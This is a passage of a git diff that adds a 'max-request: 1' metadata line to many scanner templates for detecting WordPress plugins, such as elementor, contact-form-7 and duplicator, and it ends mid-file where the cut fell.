b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: 